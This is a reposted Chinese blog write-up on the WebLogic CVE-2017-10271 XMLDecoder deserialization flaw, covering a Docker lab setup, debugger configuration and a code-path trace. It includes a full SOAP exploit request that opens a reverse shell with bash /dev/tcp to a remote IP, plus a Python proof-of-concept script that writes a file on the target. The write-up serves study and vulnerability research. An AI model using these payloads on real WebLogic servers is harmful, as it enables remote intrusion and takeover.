碼上快樂

相關內容    簡體    繁體

weblogic漏洞分析之CVE-2017-10271

本文轉載自   查看原文   2021-08-17 16:42   117    JAVA安全

weblogic漏洞分析之CVE-2017-10271

一、環境搭建

1)配置docker

這里使用vulhub的環境:CVE-2017-10271

  1. 編輯docker-compose.yml文件,加入8453端口
version: '2'
services:
 weblogic:
   image: vulhub/weblogic:10.3.6.0-2017
   ports:
    - "7001:7001"
    - "8453:8453"
  1. 啟動docker
docker-compose up -d
  1. 進入docker容器中,配置weblogic的遠程調試
cd /root/Oracle/Middleware/user_projects/domains/base_domain/bin
vi setDomainEnv.sh
  1. 如下圖位置添加兩行代碼
debugFlag="true"
export debugFlag

img

  1. 打包modules和wlserver_10.3文件夾並導出

img

2)配置idea

  1. 打開idea,wlserver_10.3文件夾放入項目中

img

  1. 配置遠程調試

img

  1. 再導入wlserver_10.3\server\lib下的jar包和modules的所有文件

img

  1. 打個斷點后訪問漏洞頁面即可看到成功觸發調試

http://192.168.202.129:7001/wls-wsat/CoordinatorPortType

img

二、漏洞復現

進入http://192.168.202.129:7001/wls-wsat/CoordinatorPortType,顯示以下頁面即有可能存在漏洞

image-20210817135539766

其他可用url

/wls-wsat/CoordinatorPortType
/wls-wsat/RegistrationPortTypeRPC
/wls-wsat/ParticipantPortType
/wls-wsat/RegistrationRequesterPortType
/wls-wsat/CoordinatorPortType11
/wls-wsat/RegistrationPortTypeRPC11
/wls-wsat/ParticipantPortType11
/wls-wsat/RegistrationRequesterPortType11

這里使用bp來進行驗證:

image-20210817135652950

注意此處要指定Content-Type: text/xml,否則會報415錯誤,如以下圖

image-20210817135721436

最后成功訪問test.txt界面http://192.168.202.129:7001/wls-wsat/test.txt

image-20210817135759551

這里貼上個反彈shell的poc:

POST /wls-wsat/CoordinatorPortType HTTP/1.1
Host: 192.168.149.139:7001
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:67.0) Gecko/20100101 Firefox/67.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1
Cache-Control: max-age=0
Content-Type: text/xml
Content-Length: 1148

<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">
<soapenv:Header>
<work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
<java version="1.4.0" class="java.beans.XMLDecoder">
<void class="java.lang.ProcessBuilder">
<array class="java.lang.String" length="3">
<void index="0">
<string>/bin/bash</string>
</void>
<void index="1">
<string>-c</string>
</void>
<void index="2">
<string>bash -i &gt;&amp; /dev/tcp/192.168.149.138/4444 0&gt;&amp;1</string>
</void>
</array>
<void method="start"/></void>
</java>
</work:WorkContext>
</soapenv:Header>
<soapenv:Body/>
</soapenv:Envelope>

image-20210817140855585

驗證python腳本,注意此腳本會創建一個test.txt文件

#!/usr/bin/env python
# coding:utf-8
 
import requests
from sys import argv
 
headers = {
    'User-Agent':'Mozilla/5.0 (Windows NT 10.0; WOW64; rv:48.0) Gecko/20100101 Firefox/48.0',
    'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
    'Upgrade-Insecure-Requests': '1',
    'Content-Type': 'text/xml'
    }
def Webogic_XMLDecoder_poc(url):
    #url="http://192.168.202.129:7001"
    posturl=url+'/wls-wsat/CoordinatorPortType'
    data = '''
    <soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">
        <soapenv:Header>
            <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
                <java version="1.6.0" class="java.beans.XMLDecoder">
                    <object class="java.io.PrintWriter">
                        <string>servers/AdminServer/tmp/_WL_internal/wls-wsat/54p17w/war/test.txt</string><void method="println">
                        <string>xmldecoder_vul_test</string></void><void method="close"/>
                    </object>
                </java>
            </work:WorkContext>
        </soapenv:Header>
        <soapenv:Body/>
    </soapenv:Envelope>
    '''
     
    print url
    try:
        r=requests.post(posturl,data=data,headers=headers,timeout=5)
        geturl=url+"/wls-wsat/test.txt"
        #print geturl
        check_result = requests.get(geturl,headers=headers,timeout=5)
        if 'xmldecoder_vul_test' in check_result.text:
            print u"存在WebLogic WLS遠程執行漏洞(CVE-2017-10271)"
    except:
        pass
 
if __name__ == '__main__':
    if len(argv) == 1:
        print "Please input python Webogic_XMLDecoder_poc.py http://xxxx:7001"
        exit(0)
    else:
        url = argv[1]
    Webogic_XMLDecoder_poc(url)

三、漏洞分析

CVE-2017-10271漏洞主要是由WebLogic Server WLS組件遠程命令執行漏洞,主要由wls-wsat.war觸發該漏洞,觸發漏洞url如下: http://192.168.xx.xx:7001/wls-wsat/CoordinatorPortType post數據包,通過構造構造SOAP(XML)格式的請求,在解析的過程中導致XMLDecoder反序列化漏洞。

weblogic/wsee/jaxws/workcontext/WorkContextServerTube類的processRequest方法中,處理POST數據包中的XML數據。var1即是傳入的xml數據

image-20210817144510585

readHeaderOld方法中,處理讀取的xml

image-20210817144923675

跟進readHeaderOld

image-20210817160936350

前面獲取了xml,使用ByteArrayOutputStream轉換成了字節流賦值給var4,然后調用了WorkContextXmlInputAdapter傳入了var4

image-20210817162053104

跟進WorkContextXmlInputAdapter中,看到其實這就是把var4傳入到XMLDecoder

image-20210817162250757

回到readHeaderOld方法,在前面進行了一些xml的封裝,獲得XMLDecoder對象后,調用了113行的receive方法

image-20210817162353963

跟進receive

image-20210817161100554

繼續跟進幾個方法后,到了WorkContextLocalMap#receiveRequest,165行調用了WorkContextEntryImplreadEntry方法

image-20210817161152749

跟進WorkContextEntryImpl#readEntry

image-20210817161319584

跟進readUTF,在這里進行了xmlDecoder.readObject觸發了xmlDecoder的反序列化,執行了ProcessBuilder.start()

image-20210817161345486

執行完這里就反彈shell成功

image-20210817161444913

這里其實也就是weblogic中的WLS組件接收到SOAP格式的請求后,未對解析xml后的類,參數等進行處理,一系列傳入最后執行了xmlDecoder.readObject觸發調用了類中的方法,產生漏洞。


免責聲明!

本站轉載的文章為個人學習借鑒使用,本站對版權不負任何法律責任。如果侵犯了您的隱私權益,請聯系本站郵箱yoyou2525@163.com刪除。



猜您在找 Weblogic(CVE-2017-10271)漏洞復現 weblogic新漏洞學習cve-2017-10271 WebLogic XMLDecoder反序列化漏洞(CVE-2017-10271)復現 Weblogic < 10.3.6 'wls-wsat' XMLDecoder 反序列化漏洞(CVE-2017-10271) 利用DNSlog回顯Weblogic(CVE-2017-10271) 漏洞執行命令結果 weblogic系列漏洞整理 -- 4. weblogic XMLDecoder 反序列化漏洞(CVE-2017-10271、CVE-2017-3506) #再談 CVE-2017-10271回顯POC構造 漏洞分析:CVE-2017-17215 CVE-2017-3248——WebLogic反序列化漏洞利用工具 CVE-2017-11882 漏洞分析總結 新手漏洞分析詳細教程
 
粵ICP備18138465號   © 2018-2025 CODEPRJ.COM